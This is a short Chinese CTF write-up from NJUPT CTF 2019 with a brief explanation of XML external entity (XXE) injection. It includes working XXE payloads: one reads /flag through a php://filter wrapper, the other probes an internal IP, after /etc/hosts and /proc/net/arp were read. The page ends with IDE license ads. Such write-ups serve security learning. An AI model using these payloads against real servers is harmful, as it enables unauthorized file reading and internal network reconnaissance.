大家好,又见面了,我是你们的朋友全栈君。
NJUPT CTF2019:
做题的时候,抓包看了一下,响应XML格式消息,并没有严格过滤,这道题读文件,
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=/flag" >]>
<ticket>
<username>&xxe;</username>
<code>aaaa</code>
</ticket>
通过读取/etc/hosts以及/proc/net/arp,推测主机ip:192.168.1.8
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://192.168.1.8/" >]>
<ticket>
<username>&xxe;</username>
<code>aaaa</code>
</ticket>
漏洞解释:
xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件和代码,造成任意文件读取、命令执行、内网端口扫描、攻击内网网站、发起Dos攻击等危害。
常见的利用,就和上面的题一样,读文件,嗅探,Dos,Blind XXE
发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/142474.html原文链接:https://javaforall.cn
【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛
【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...